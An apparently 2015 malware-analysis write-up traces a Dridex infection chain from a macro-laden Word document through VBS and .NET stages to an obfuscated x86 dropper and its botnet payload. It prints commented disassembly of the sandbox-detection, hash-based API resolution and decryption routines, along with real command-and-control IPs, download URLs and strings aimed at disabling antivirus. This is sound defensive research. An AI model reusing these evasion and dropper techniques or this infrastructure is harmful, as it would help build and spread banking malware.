In-depth analysis of a dropper of Dridex malware
There is a french version here. For other language, you can translate thos page with Google Traductor : |
June 18, 2015, 01:30. Last modified on june 24, 2015 01:29 (modifications log)
In-depth analysis of a Dridex malware dropper
A major spam campaign started 2015 June 8 in France for distributing a malware known as Dridex. You will find below a detailed analysis of the functioning of one of his droppers.
Note: several different droppers are currently used in successive spam campaigns to distribute Dridex. The analyzed dropper was received on 08/06/2015.
Contents
- Overview of the operation of Dridex dropper studied
- Step 1 - Word Document received via spam campaign : download of an intermediate Dridex dropper
- Step 2 - VBS Script downloaded: download of Dridex dropper
- Step 3 - intermediate .net Executable : decryption of a second .net assembly
- Step 4 - second .net Assembly: decrypting an x86 dropper
- Step 5 - x86 dropper : deciphering and launching the payload (botnet 120)
- Digression on obfuscation methods used
- "linear" or "stream-oriented" disassembler
- Unnecessary instructions
- Sandbox detection and elegant management of callback function
- Total obfuscation of Windows API calls
- Modifying data via the stack
- Back to the subject of the dropper
- So what ? Download final Dridex payload DLL !
- Appendices
Overview of the dropper operations
The user workstation compromise kinematics is as follows :
- User receives an email inviting him to open the attachment presented as an unpaid bill ;
- User opens the document attached to the email, which triggers the execution of a VBA macro embedded in the Word document ;
- The VBA macro downloads a file hosted on pastebin and containing VBS code, then triggers the execution of this code ;
- The VBS code downloads an .net executable from 212.76.130.99 server, then launches this executable ;
- The executable contains C# code and an abnormally large resource. The C# code recombines the content of a number of data tables to reconstruct a second .net assembly, and then loads and executes this assembly ;
- The code of the second assembly allocates a memory area, copies a data table about 3Kb and executes this datas, which correspond to x86 machine code ;
- The dropper launched, largely obfuscated (no string in clear, no imports or API calls visible) checks for the charge stored in a resource of the downloaded executable (see 4), decrypts and decompresses the content before executing it ;
- The payload (which will proove to be the "botnet 120") only has to ensure its sustainability in the system and to conduct his malicious activities ;
- The botnet 120 will contact his C&C and download the final Dridex payload DLL !
Please, note that steps 3 and 4 are specific to Dridex botnet 120 (thanks to Techhelplist). Some others Dridex droppers skips these steps.
The rest of this page aims to detail these steps by explaining the obfuscation methods used, including the dropper x86. Still with the aim of improving detection capabilities and block the infection process.
Step 1 - Word Document received via spam campaign : download of an intermediate Dridex dropper
As often, the first step in the infection lies in opening a document attached to an email. In our case it is a Word document expected to present a bill to the user and actually containing a piece of VBA code whose purpose is to download the intermediate dropper.
In the case studied here, the downloaded Word document has the following characteristics :
Characteristics of Word document received by email | |
---|---|
Origin | Received by mail |
Name | 2209_0C8D8115C2D2.doc |
Size | 22 834 bytes |
Date | 06/08/2015 11:43:00 |
MD5 | 666B2121CFB7871CD1354B08D51A36E4 |
SHA256 | 62E3CF46F3C805E99913C718A1A32076F9EECC9206CAC45B080F2268064632E0 |
VirusTotal | |
malwr |
The VBA code is executed when opening the Word document. It is complicated by the addition of many unnecessary waiting routines as well as some classic techniques of VB code obfuscation (cutting and inversing strings for example). The original macro code is available here.
Once "de-obfuscated", the code is as follows :
The macro therefore downloads a VBS file from the Pastebin service, and then executes the VBS file.
Step 2 - VBS Script downloaded: download of Dridex dropper
The downloaded VBS file code is fairly succinct. Its characteristics are the following :
Characteristics of the VBS file downloaded | |
---|---|
Origin | Downloaded from http://pastebin.com/download.php?i=1YzPHtum |
Name | hGYdsf.vbs |
Size | 3 491 bytes |
Date | 06/08/2015 12:20:56 |
MD5 | 70EE4226E623FBCE3E82D56E1A531F08 |
SHA256 | AA5E877FC346FA948794CAF90672D00F99109D64CD9050B95E1ECD72776B9312 |
VirusTotal (26/57 on the 06/14/2015) | |
malwr |
The code is obfuscated by conventional string replacements and concatenation of chr (xxx)
with no particular interest.
Once de-obfuscated, the code is as follows :
The intermediate dropper :
- downloads an executable from an HTTP server and stores it in the temporary directory on the host machine as "tryewdgh.exe" ;
- launch the executable ;
- downloads an image on the savepic.ru service, probably to send a signal that a new machine is being compromised ;
- waits for the executable being launched ;
- downloads another picture on the savepic.ru service, probably to send a signal that the compromise is well underway.
The interesting point here lies in the two savepic.ru calls that allow the developer of the spam campaign to track the progress of the compromising process.
Step 3 - intermediate .net Executable : decryption of a second .net assembly
The .net downloaded executable has the following characteristics :
Characteristics of the .net downloaded executable | |
---|---|
Origin | Downloaded from http://212.76.130.99/bt/bt/get5.php |
Name | tryewdgh.exe |
Size | 235 240 bytes |
Date | 06/08/2015 12:21:00 |
MD5 | AB619931EBF56EE0137548F18209F38B |
SHA256 | C1E879EA756603D66A27C74D8297B78582D808DE48D4E02608F3E57193542122 |
VirusTotal (37/57 on the 06/14/2015) | |
malwr also known as "crypted.120.exe". |
The executable contains several resources and types :
The size of a one of the resources is surprisingly large :
Regarding the code, only the KampongFlabby
class is interesting. It contains more than 300 methods, the vast majority are of of no interest except for being capable to fool antivirus
by generating various executables on the fly.
Most methods return a value or modify a received parameter. They also often contain valid code but included in
if()
statements which are always false. Example :
The only interesting and used methods are ExploitsForearms()
, HatchetsDramatists()
, IslamFrugality()
, �L~()
(entry point) and MarshalledLiverworks()
.
Note : GlitteringGlistened()
method contains no code. it probably just serves to muddy the waters because some decompilers fail to decompile it.
The entry point simply calls KampongFlabby.ExploitsForearms();
method, which contains almost all of the intermediate dropper code.
The obfuscated code is available here. Once cleaned, the code is as follows :
As can be seen from reading the source, ExploitsForearms()
method :
- creates several data arrays, some of them very large, containing a messy .net assembly ;
- combines all of these data in a single array ;
- calls the
HatchetsDramatists()
method passing in as parameters the array, array size, permutation key and an unused parameter. MethodHatchetsDramatists()
will take care to reorder the bytes ; - loads the assembly and launchs it.
Cleaned HatchetsDramatists()
method is the following :
This method is interresting because of the modification algorithm of the key at each permutation.
The new .NET assembly being launched, we can take the next step...
Step 4 - second .net Assembly: decrypting an x86 dropper
The intermediate assembly (available here) is of no particular interest. It contains a data block of about 3Kb that it will load into memory and run. The data in question contains a piece of x86 code. The intermediate assembly can be summed up with the following code :
So, we can go directly to the next step...
Step 5 - x86 dropper : deciphering and launching the payload
Code is available here : Dridex x86 dropper disassembled, and binary there : Dridex x86 dropper (binary).
See here for disassembled and commented code is also available.
In this part we will see what the dropper does and detail its anti-disassembly and sandbox detection methods.
Digression on obfuscation methods used
This code is interesting for several reasons. It exhibits a number of techniques to make it fairly resistant to static analysis :
- Consumption of
call
return address as API callback enumeration ; - Immoderate use of
jmp
to mislead disassemblers operating in "linear" mode ; - Total obfuscation of imports used ;
- Changing variables by stacking them and modifying them directly on the stack ;
- Disseminating useless instructions to complicate the reading and understanding of the code ;
"linear" or "stream-oriented" disassembler
As a preliminary, an illustration of the use of JMP
to mislead disassemblers operating in linear mode. Consider the following code disassembled by
IDA, wich works in "flux" mode :
seg000:000002FE C7 45 F8 00 00 00+ mov [ebp+var_8], 0
seg000:00000305 46 inc esi
seg000:00000306 8D 45 F8 lea eax, [ebp+var_8]
seg000:00000309 11 DE adc esi, ebx
seg000:0000030B EB 03 jmp short loc_310
seg000:0000030D BC db 0BCh ; +
seg000:0000030E EA db 0EAh ; Û
seg000:0000030F AB db 0ABh ; ½
seg000:00000310 loc_310:
seg000:00000310 50 push eax
seg000:00000311 47 inc edi
seg000:00000312 E8 1F 00 00 00 call sub_336
We can ask what are the 3 bytes 0x30D - 0x30F
? They serve to make the code less readable by disassemblers that work
in linear mode. For example, Ollydbg decodes the same sequence as follows :
seg000:000002FE C7 45 F8 00 00 00+ mov [ebp+var_8], 0
seg000:00000305 46 inc esi
seg000:00000306 8D 45 F8 lea eax, [ebp+var_8]
seg000:00000309 11 DE adc esi, ebx
seg000:0000030B EB 03 jmp short 000000310
seg000:0000030D BC EA AB 50 47 mov esp, 4750ABEA
seg000:00000312 E8 1F 00 00 00 call sub_336
We can note that in the case of disassembly in linear mode, you see a JMP
to a destination in the middle of an MOV
instruction ! In linear mode,
disassembler disassembles the instructions one after the other, so after the interpretation of two bytes of the JMP
, it interprets following bytes as a
MOV ESP, 4750ABEA
, wrongly !
A disassembler operating in stream mode stores the destination of the JMP
and resumes disassembly there. Thus it correctly decodes the sequence PUSH EAX / INC EDI
in
0x310
and interprets the bytes in 0x30D - 0x30F
as data since they have no sense as instructions.
The remaining difficulty as a reader of the code is to decide whether these data are meaningful or not... In this case it is not.
In the rest of this article, the JMP
and skipped unnecessary data will be removed from the code to improve readability.
Unnecessary instructions
Before returning to what the dropper does, second digression on unnecessary instructions to complicate the understanding of the code. If one studies the following code :
seg000:00000276 nextDword: seg000:00000276 31 C1 xor ecx, eax seg000:00000278 83 FB 00 cmp ebx, 0 seg000:0000027B 74 6A jz short loc_2E7 ; ======> No more bytes to decipher... seg000:0000027D 0F AF FF imul edi, edi seg000:00000280 8B 06 mov eax, [esi] ; On prend 4 octets de la source... seg000:00000282 49 dec ecx seg000:00000283 33 45 10 xor eax, [ebp+key] ; ...on les déchiffre... seg000:00000286 0F AF FE imul edi, esi seg000:00000289 89 06 mov [esi], eax ; ...et on les remet dans le buffer ! seg000:0000028B 09 4D DC or [ebp+var_24], ecx seg000:0000028E FF 75 10 push [ebp+key] ; Pushs the key on the stack seg000:00000291 89 F2 mov edx, esi seg000:00000293 C1 04 24 04 rol [esp+30h+var_30], 4 ; Rolling the key 4 bits left seg000:00000297 C7 45 E0 FD 00 00+ mov [ebp+var_20], 0FDh seg000:0000029E C1 04 24 02 rol [esp+30h+var_30], 2 ; ...and 2 more bits... seg000:000002A2 6B FF 0B imul edi, 0Bh seg000:000002A8 D1 04 24 rol [esp+30h+var_30], 1 ; ...and one more bit ! seg000:000002AB F7 DF neg edi seg000:000002AD 8D 4D 0C lea ecx, [ebp+bufferSize] seg000:000002B0 8B 09 mov ecx, [ecx] ; ECX = buffer size seg000:000002B2 29 0C 24 sub [esp+30h+var_30], ecx ; Key = key-bufferSize seg000:000002B5 83 DA 17 sbb edx, 17h seg000:000002B8 81 2C 24 8A 3F 61+ sub [esp+30h+var_30], 49613F8Ah ; Key = Key-0x49673F8A seg000:000002BF 4A dec edx seg000:000002C4 81 2C 24 48 C3 34+ sub [esp+30h+var_30], 34C348h ; Key=Key-0x34C348 seg000:000002CB 1B 7D F8 sbb edi, [ebp+var_8] seg000:000002D2 8F 45 10 pop [ebp+key] ; Pops the key modified directly on the stack seg000:000002D5 29 D8 sub eax, ebx seg000:000002D7 4B dec ebx seg000:000002D8 8B 45 DC mov eax, [ebp+var_24] seg000:000002DF 46 inc esi seg000:000002E0 F7 DA neg edx seg000:000002E5 EB 8F jmp short nextDword seg000:000002E7 loc_2E7: seg000:000002E7 89 75 F0 mov [ebp+var_10], esi seg000:000002EF 5E pop esi seg000:000002F0 5B pop ebx seg000:000002F1 C9 leave seg000:000002F2 C2 0C 00 retn 0Ch
We can note that the registers EDI
and EDX
are used repeatedly to change their content, but never to use it. These registers are not used
by the caller. One can also see at 0x2D5
that the SUB EAX, EBX
instruction is unnecessary since it is followed by MOV EAX, [EBP + var_24]
which will overwrite its content !
The dropper code is riddled with unnecessary instructions greatly complicating his reading and understanding.
Sandbox detection and elegant management of callback function
The first action of the dropper is to count the number of windows in the system by using the EnumWindows ( WNDENUMPROC lpEnumFunc, LPARAM lParam )
function, probably
to detect execution within some sandbox. The EnumWindows ()
function has two parameters : a pointer to a callback function and a DWORD pointer to propagate to this function.
The callback function will be called by EnumWindows ()
for each window of the system.
The sandbox detection function uses a fun trick: it prepares the lparam
to pass to EnumWindows (this will be a pointer to a window counter),
then makes a CALL
(see blue) to a piece of code that will call EnumWindows ()
. Since no other parameter than lParam
was
stacked, the return address CALL
will be recovered in the stack with the EnumWindows ()
which will interpret it as the address of the callback function !
In this way, the code for the callback function (see Green) is found in the middle of the sandbox detection function and IDA is totally lost as it
can not detect that the code from the address 0x317
is a callback and seeing a CALL
it creates an sub_336
, wrongly ending the detectSandbox
sub and losing in the interpretation of the stack.
seg000:000002F5 ; *************************************************************************************** seg000:000002F5 ; * detectSandbox (to be confirmed) ? * seg000:000002F5 ; *************************************************************************************** seg000:000002F5 ; * DESCRIPTION : this function counts the Windows in the system and returns 1 if the * seg000:000002F5 ; * number of windows is 15, 1C, 7 or 6, else it returns 0. * seg000:000002F5 ; * * seg000:000002F5 ; *************************************************************************************** seg000:000002F5 seg000:000002F5 detectSandbox proc near seg000:000002F5 var_8 = dword ptr -8 seg000:000002F5 var_4 = dword ptr -4 seg000:000002F5 arg_0 = dword ptr 8 seg000:000002F5 arg_4 = dword ptr 0Ch seg000:000002F5 55 push ebp seg000:000002F6 89 E5 mov ebp, esp seg000:000002F8 83 EC 34 sub esp, 34h seg000:000002FE C7 45 F8 00 00 00+ mov [ebp+var_8], 0 seg000:00000306 8D 45 F8 lea eax, [ebp+var_8] ; [ebp+var_8] is the counter of windows seg000:00000310 50 push eax ; EAX refers [ebp+var_8] => lpParam for future call to EnumWindows(); seg000:00000312 E8 1F 00 00 00 call sub_336 seg000:00000317 ; We will never return here since we have stacked only one parameter and called a portion seg000:00000317 ; of code who will call EnumWindows() which consumes two parameters. The return address stacked by the call will be seg000:00000317 ; used as the EnumWindows callback function. seg000:00000317 ; ======================================================================================= seg000:00000317 seg000:00000317 seg000:00000317 ; --------------------------------------------------------------------------------------- seg000:00000317 ; Entry point of the EnumWindows callback function called by sub_336 seg000:00000317 ; seg000:00000317 ; BOOL CALLBACK EnumWindowsProc ( _In_ HWND hwnd, _In_ LPARAM lParam ); seg000:00000317 ; seg000:00000317 ; This callback function is used to count the number of windows in the system. seg000:00000317 19 CA sbb edx, ecx ; dumb instruction not removed to have something in 0x317 seg000:00000319 8B 44 24 08 mov eax, [esp+arg_0] ; EAX = lParam = pointer to windows counter seg000:00000324 FF 00 inc dword ptr [eax] ; Increment windows counter seg000:0000032B B8 01 00 00 00 mov eax, 1 ; Return 1 to continue enumeration seg000:00000331 C2 08 00 retn 8 seg000:00000336 ; --------------------------------------------------------------------------------------- seg000:00000336 seg000:00000336 seg000:00000336 ; ======================================================================================= seg000:00000336 ; This is not really a subroutine. IDA had been fooled by the EnumWindows seg000:00000336 ; callback function hidden into sub_2F5 seg000:00000336 sub_336 proc near seg000:00000336 68 21 5E 53 7C push 7C535E21h ; 'User32.dll' seg000:0000033B E8 D9 FC FF FF call getModuleHandle seg000:00000340 68 CA 16 5D 38 push 385D16CAh ; EnumWindows hash seg000:00000345 50 push eax seg000:00000346 E8 BD FD FF FF call getAPIAddress seg000:0000034B FF D0 call eax ; Call to EnumWindows ( WNDENUMPROC lpEnumFunc, LPARAM lParam ); seg000:0000034D ; Here we return from EnumWindows() and [EBP-8] contains the number of windows enumerated seg000:0000034D ; It seems that some sandboxes have only a few windows to enumerate because seg000:0000034D ; if there is only 0x15, 0x1C, 7 or 6 windows, we will terminate here !seg000:0000034D seg000:0000034F 83 7D F8 15 cmp dword ptr [ebp-8], 15h ; [EBP-8] is the windows counter (Value = 0x5A in my XP VM) seg000:00000353 74 2A jz short loc_37F seg000:0000035B 83 7D F8 1C cmp dword ptr [ebp-8], 1Ch seg000:0000035F 74 1E jz short loc_37F seg000:00000363 83 7D F8 07 cmp dword ptr [ebp-8], 7 seg000:00000367 74 16 jz short loc_37F seg000:0000036F 83 7D F8 06 cmp dword ptr [ebp-8], 6 seg000:00000373 74 0A jz short loc_37F seg000:0000037A EB 0E jmp short loc_38A seg000:0000037F loc_37F: ; ... seg000:00000381 B8 01 00 00 00 mov eax, 1 ; Return 1 ==> process will be terminated ! seg000:00000388 C9 leave seg000:00000389 C3 retn ; ===> We will come back in 0x3B1, return of caller of detectSandbox ! seg000:0000038A loc_38A: ; ... seg000:0000038D 31 C0 xor eax, eax ; Return 0 => we will live... seg000:00000391 C9 leave seg000:00000392 C3 retn ; ===> We will come back in 0x3B1, return of caller of detectSandbox ! seg000:00000392 sub_336 endp
Total obfuscation of Windows API calls
You might have noticed from 0x336
to 0x346
the unusual mode Windows API invocation ?
Here's another example to retrieve the handle of the current application :
seg000:000003C6 ; Stacking API parameters seg000:000003C6 6A 00 push 0 ; Retrieve current app handle seg000:000003CF ; Retrieving DLL handle seg000:000003CF 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' hash seg000:000003D4 E8 40 FC FF FF call getModuleHandle ; Rtrieve Kernel32.dll handle in EAX seg000:000003D9 ; Retrieving API function address seg000:000003D9 68 FD 49 87 C6 push 0C68749FDh ; 'GetModuleHandleW' hash seg000:000003DE 50 push eax ; Pushs Kernel32.dll handle for getAddress call seg000:000003DF E8 24 FD FF FF call getAPIAddress ; Retrieve GetModuleHandle() entry point in EAX seg000:000003E4 ; Calling API function seg000:000003E4 FF D0 call eax ; GetModuleHandle( NULL );
The dropper uses a total obfuscation method consisting in :
- a module handle search function based on a hash of its name
- a search function for finding exported function address operating on the basis of a hash of the function name
Each time the dropper needs to call a Windows API, it stacks the parameters to send to the API (here PUSH 0
to retrieve the handle of the current application), then
it pushes the hash name of the DLL containing the desired API and calls the DLL handle recovery function. Then he pushes the hash of the name of the desired function, and
the handle of the DLL and calls the API address search function. Finally he calls the desired Windows API.
The API search function in the DLL (function here named getAPIAddress
) is classic : it parse the table of exports of the DLL module
in memory, hashing each function name it exports and comparing it to the desired hash.
The search DLL handle function uses the PEB and the PEB_LDR_DATA to walk throught the process's list of loaded module and retrieve the one looked for by comparing hash of the DLL name.
Modifying data via the stack
Final point of interest in code reading complication : in the decryption function of the compressed executable hidden in a sequence of resources, the dropper uses
a sequence of instructions like PUSH DWORD PTR SS: [EBP + 10h]
then changes of the DWORD
at the top of the stack, such as ROL [ESP], 4
then DWORD PTR SS POP: [EBP + 10h]
.
An inattentive reader will not see that the value pushed on the stack has been modified before being recovered since generally within the same block of code, instructions
PUSH
and POP
are used precisely to preserve the pushed value !
You can see an illustration of this technique a little further down in this page in the decryption routine named bufferDecipher
(see here), at offsets 0x28E
,
0x293
, 0x29E
, 0x2A8
, 0x2B2
, 0x2B8
, 0x2C4
and 0x2DD
.
Back to the subject of the dropper
After this digression, back to the subject of the dropper operations. Its main function will be to decrypt and decompress a new executable hidden in a resource of the .net executable launched. Once decrypted and decompressed, it will run it.
The recovery method of encrypted data is rather special :
- the dropper first retrieves the file name running and then opens the file, reads its size, allocates a memory area and reloads the file in this area (see code
from
0x3CF
to0x580
); - then it reconstitutes a 20-byte buffer in memory with the following routine :
seg000:00000581 B8 56 CD D3 A0 mov eax, 0A0D3CD56h seg000:0000058A B9 05 00 00 00 mov ecx, 5 seg000:00000596 8D 7D C4 lea edi, [ebp-3Ch] ; EDI pointe sur EBP-3C seg000:000005A0 4A dec edx seg000:000005A1 89 C2 mov edx, eax ; EDX=0xA0D3CD56 seg000:000005A6 C1 C2 07 rol edx, 7 ; ROL EDX,7 seg000:000005AB 01 D0 add eax, edx ; ADD EDX,EAX seg000:000005AD F7 DE neg esi seg000:000005AF AB stosd ; EAX -> [ES:EDI] seg000:000005B3 49 dec ecx seg000:000005B4 75 EA jnz short loc_5A0
The content of the buffer located in[EBP-3Ch]
after its constitution will be as follows :
A6 78 BA 0A AB CB F6 67 5E A1 5C 63 8F 50 AD 11 17 98 55 E8
- and its structure will prove to be the following :
struct dridexDropperSignature { // Value unsigned int signature; // 0x0ABA78A6 unsigned int signature2; // 0x67F6CBAB unsigned int compressedModuleSizeKey; // 0x635CA15E used to decipher compressed module size unsigned int uncompressedModuleSizeKey; // 0x11AD508F used to decipher uncompressed module size unsigned int decipheringKey; // 0xE8559817 used to decipher the buffer deciphering key };
- the dropper will scan the executable reloaded into memory from the end, searching for the 4-byte pattern
signatures
. Once found, it will control the following 4 bytes are identical tosignature2
. It will thus have found the beginning of the data block of interest. - the dropper will then use the
DWORD
compressedModuleSizeKey
to decipher with a simpleXOR
the following 4 bytes containing the size of compressed data. He will thus know how much data to decipher, then unzip. - it will then do the same with the
DWORD
uncompressedModuleSizeKey
to decipher with the same simpleXOR
the following 4 bytes containing the size of the uncompressed data ; - Finally, it will apply the same procedure to recover the decryption key contained in the following 4 bytes.
- Armed with these necessary informations, the dropper will be able to decrypt the data using the following function (blue code deciphering the data and red one permuting key) :
seg000:0000024E bufferDecipher proc near seg000:0000024E var_30 = dword ptr -30h seg000:0000024E var_24 = dword ptr -24h seg000:0000024E var_20 = dword ptr -20h seg000:0000024E var_1C = dword ptr -1Ch seg000:0000024E var_10 = dword ptr -10h seg000:0000024E var_8 = dword ptr -8 seg000:0000024E lpBuffer = dword ptr 8 seg000:0000024E bufferSize = byte ptr 0Ch seg000:0000024E key = dword ptr 10h seg000:0000024E 55 push ebp ; lgBuffer = 0xB070 seg000:0000024E ; key = 0xA0D3CD56 seg000:0000024F 89 E5 mov ebp, esp seg000:00000251 83 EC 24 sub esp, 24h seg000:00000254 53 push ebx seg000:00000255 56 push esi seg000:00000259 8D 45 0C lea eax, [ebp+bufferSize] seg000:0000025C FF 30 push dword ptr [eax] ; Stacks buffer size... seg000:0000025E 87 7D F0 xchg edi, [ebp+var_10] seg000:00000261 5B pop ebx ; ...and unstacks into EBX ! seg000:00000268 83 EB 03 sub ebx, 3 seg000:0000026B 87 CA xchg ecx, edx seg000:00000270 8B 75 08 mov esi, [ebp+lpBuffer] seg000:00000276 seg000:00000276 nextDword: seg000:00000276 31 C1 xor ecx, eax seg000:00000278 83 FB 00 cmp ebx, 0 seg000:0000027B 74 6A jz short loc_2E7 ; ======> No more bytes to decipher... seg000:00000280 8B 06 mov eax, [esi] ; On prend 4 octets de la source... seg000:00000282 49 dec ecx seg000:00000283 33 45 10 xor eax, [ebp+key] ; ...on les déchiffre... seg000:00000289 89 06 mov [esi], eax ; ...et on les remet dans le buffer ! seg000:0000028B 09 4D DC or [ebp+var_24], ecx seg000:0000028E FF 75 10 push [ebp+key] ; Pushs the key on the stack seg000:00000293 C1 04 24 04 rol [esp+30h+var_30], 4 ; Rolling the key 4 bits left seg000:0000029E C1 04 24 02 rol [esp+30h+var_30], 2 ; ...and 2 more bits... seg000:000002A8 D1 04 24 rol [esp+30h+var_30], 1 ; ...and one more bit ! seg000:000002AD 8D 4D 0C lea ecx, [ebp+bufferSize] seg000:000002B0 8B 09 mov ecx, [ecx] ; ECX = buffer size seg000:000002B2 29 0C 24 sub [esp+30h+var_30], ecx ; Key = key-bufferSize seg000:000002B8 81 2C 24 8A 3F 61+ sub [esp+30h+var_30], 49613F8Ah ; Key = Key-0x49673F8A seg000:000002C4 81 2C 24 48 C3 34+ sub [esp+30h+var_30], 34C348h ; Key=Key-0x34C348 seg000:000002D2 8F 45 10 pop [ebp+key] ; Pops the key modified directly on the stack seg000:000002D7 4B dec ebx seg000:000002D8 8B 45 DC mov eax, [ebp+var_24] seg000:000002DF 46 inc esi seg000:000002E5 EB 8F jmp short nextDword seg000:000002E7 loc_2E7: ; ... seg000:000002E7 89 75 F0 mov [ebp+var_10], esi seg000:000002EF 5E pop esi seg000:000002F0 5B pop ebx seg000:000002F1 C9 leave seg000:000002F2 C2 0C 00 retn 0Ch seg000:000002F2 bufferDecipher endp
The decryption algoritghme in C is as follows : - Once the data decrypted, it will allocate a memory area the size of decrypted data, and then call
RtlDecompressBuffer ()
to unzip the buffer, and we will find, in the memory area allocated, a new PE executable almost ready to be executed.
Executable characteristics :
Deciphered and unzipped payload characteristics Origin Deciphered and unzipped by the dropper, from the resource section Name NA Size 64 000 bytes Date NA MD5 7AC7416FCAB7745F9000EA3E281C8318 SHA256 BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D VirusTotal (26/57 on the 06/14/2015) malwr - ...the dropper just have to create a new process, injecting the contents of the executable in it and run it !
So What ? Download final Dridex payload DLL !
Just after being launched, the payload will prooved to be the Dridex "botnet 120" with this deciphered configuration :
<config botnet="120"> <server_list> 50.63.174.16 :6443 79.143.191.147 :6443 37.143.9.63 :4433 </server_list> </config>
Botnet 120 will contact his C&C (50.63.174.16) and download the final Dridex payload DLL from 79.143.191.147 :
Final payload downloaded by "botnet 120" | |
---|---|
Origin | Downloaded by botnet 120 from 79.143.191.147 on the June 23, 2015 |
Name | 27.tmp |
Size | 491 520 bytes |
Date | NA |
MD5 | D7113159AC45B5958AD69D33B066529D |
SHA256 | A1254BF4F9E8D3BA808E1C3F9B840130569892905B7A209B1B7CE1B4610602C4 |
VirusTotal (14/57 on the 06/23/2015) | |
malwr |
We have to note that in the meantime of this analysis a new dropper has been launched, with similar VBA and VBS code but different intermediate dropper.
To be continued...
Appendices
Modifications
- June 18, 2015 01:30 - first upload
- June 18, 2015 22:15
- forgot to put the x86 dropper commented disassembled listing. Here it is !
- link to french page corrected. Désolé :-/
- June 19, 2015 01:08 - Payload deciphered strings added in appendices
- June 24, 2015 00:02 - Illustration modified (Step 9 added), payload ("botnet 120") config added and final Payload added.
Downloadable files
- Word document with Dridex dropper pwd="infected" - WARNING : although URL is down, don't execute macros !
- Dridex intermediate 1 dropper - vbs script pwd="infected" - WARNING : although URL is down, don't execute this script !
- Dridex intermediate dropper .net assembly pwd="infected" - WARNING : don't execute this one !!!
- Dropper x86 pwd="infected" - x86 dropper code
- Dropper x86 disasembled and commented
- Dridex "botnet 120" payload pwd="infected" - WARNING : don't execute this one !!!
- Dridex final payload downloaded by "botnet 120" pwd="infected" - WARNING : don't execute this one !!!
Tools used
The tools used are fairly standard.
- IDA Pro The best known and most pleasant to use since Sourcer !
- ILSpy Open-source .NET assembly browser and decompiler.
- VirtualBox In order to dynamically study the x86 dropper
- Oletools Very good OLE files analyzer. Can extract macros from documents.
- OllyDbg To run the dropper in a VM and follow its code, it complements the static analysis with IDA
- PEview and pestudio to easily dump the Payload ressources
Links
- Evolution of Dridex June 18, 2015
- Chasing cybercrime : network insights of Dyre and Dridex Trojan Bankers Blueliv, april 2015
- McAfee Labs Threat Advisory : Dridex June 15, 2015
- ‘Banking’ Malware Dridex Arrives via Phishing EmailMc Afee Labs - Mar 26, 2015
- Dridex Code Breaking – Modify the Malware to Bypass the VM Bypass An older Dridex dropper
- TSPY_DRIDEX.WQJ - Threat Encyclopedia November 19,2014
Payload (botnet 120) deciphered strings
Although I don't have reversed all the botnet 120 yet, I deciphered some ciphered strings blocks. These confirms that it's the Dridex botnet 120 malware :
Config :
Deciphered strings of Dridex Botnet 120 Malware ----------------------------------------------------- Date... : June 08, 2015 MD5.... : 7AC7416FCAB7745F9000EA3E281C8318 SHA256. : BF5640FA9D6F2 Offset. : In memory decipher <config botnet="120"> <server_list> 50.63.174.16 :6443 79.143.191.147 :6443 37.143.9.63 :4433 </server_list> </config>
First strings block :
Deciphered strings (1/5) of Dridex Botnet 120 Malware ----------------------------------------------------- Date... : June 08, 2015 MD5.... : 7AC7416FCAB7745F9000EA3E281C8318 SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D Offsets : 0x40A058-0x40A27F (PE file offsets : 0x9058-0x927F) Count String 0 MBAMService 1 $$$Secure UAP 2 Program Manager 3 Progman 4 edg 5 .tmp 6 .exe 7 updfiles\ 8 upd.ver 9 lastupd.ver 10 \Avg20%d\update\ 11 download 12 \TEMP\avwin.ini 13 "%savconfig.exe" /SAVEAVWININI="avwin.ini;" 14 Local AppData 15 {A520A1A4-1780-4FF6-BD18-167343C5AF16} 16 AppDataDir 17 AppDataDirectory 18 Path
Second strings block :
Deciphered strings (2/5) of Dridex Botnet 120 Malware ----------------------------------------------------- Date... : June 08, 2015 MD5.... : 7AC7416FCAB7745F9000EA3E281C8318 SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D Offsets : 0x4A280-0x40DA9F (PE file offsets : 0x9280-0xCA9F) Count String 0 SYSTEM/CurrentControlSet/Control/ComputerName/ComputerName 1 SOFTWARE/Microsoft/Windows NT/CurrentVersion 2 <loader><get_module unique="%s" botnet="%d" system="%d" name="bot" bit="%d"/> 3 SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall 4 <soft><![CDATA[ 5 ]]></soft></loader> 6 <module 7 Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders 8 botnet=" 9 <server_list> 10 </server_list> 11 rundll32.exe "%S" NotifierInit 12 $&=-+?,~ +=&_.$~@abcsefghijklmnopqrstuvwxyz0123456789ABCSEFGHIJKLMNOPQRSTUVWXYZ 13 <cfg net="%d" build="0"><startup>%s</startup><del>%S</del></cfg> 14 Software/Microsoft/Windows/CurrentVersion/Explorer/CLSID/%s/ShellFolder 15 ComputerName 16 Volatile Environment 17 InstallDate 18 USERNAME 19 <nodes> 20 </nodes> 21 ALLUSERSPROFILE 22 \Malwarebytes\Malwarebytes Anti-Malware\ 23 exclusions.dat 24 Configuration\settings.conf 25 Configuration\scheduler.conf 26 SYSTEM/CurrentControlSet/services/MBAMProtector/Parameters 27 ProductPath 28 \mbam.dll 29 ProtectionStop 30 SchedulerStop 31 SelfProtectionDisable 32 .KB 33 DisplayName 34 DisplayVersion 35 SOFTWARE/ESET/ESET Security/CurrentVersion/Info 36 SYSTEM/CurrentControlSet/services/Avg/SystemValues 37 SOFTWARE/Avira/Antivir Desktop 38 49E908752A216D26486BFFA9E2D6EF2D368975D62A7B7532B76E547A14FDBAAD8062E3CE8838CEB5E414A393662135499048B521F24528A13923CB2B17DCD943C28F8E 39 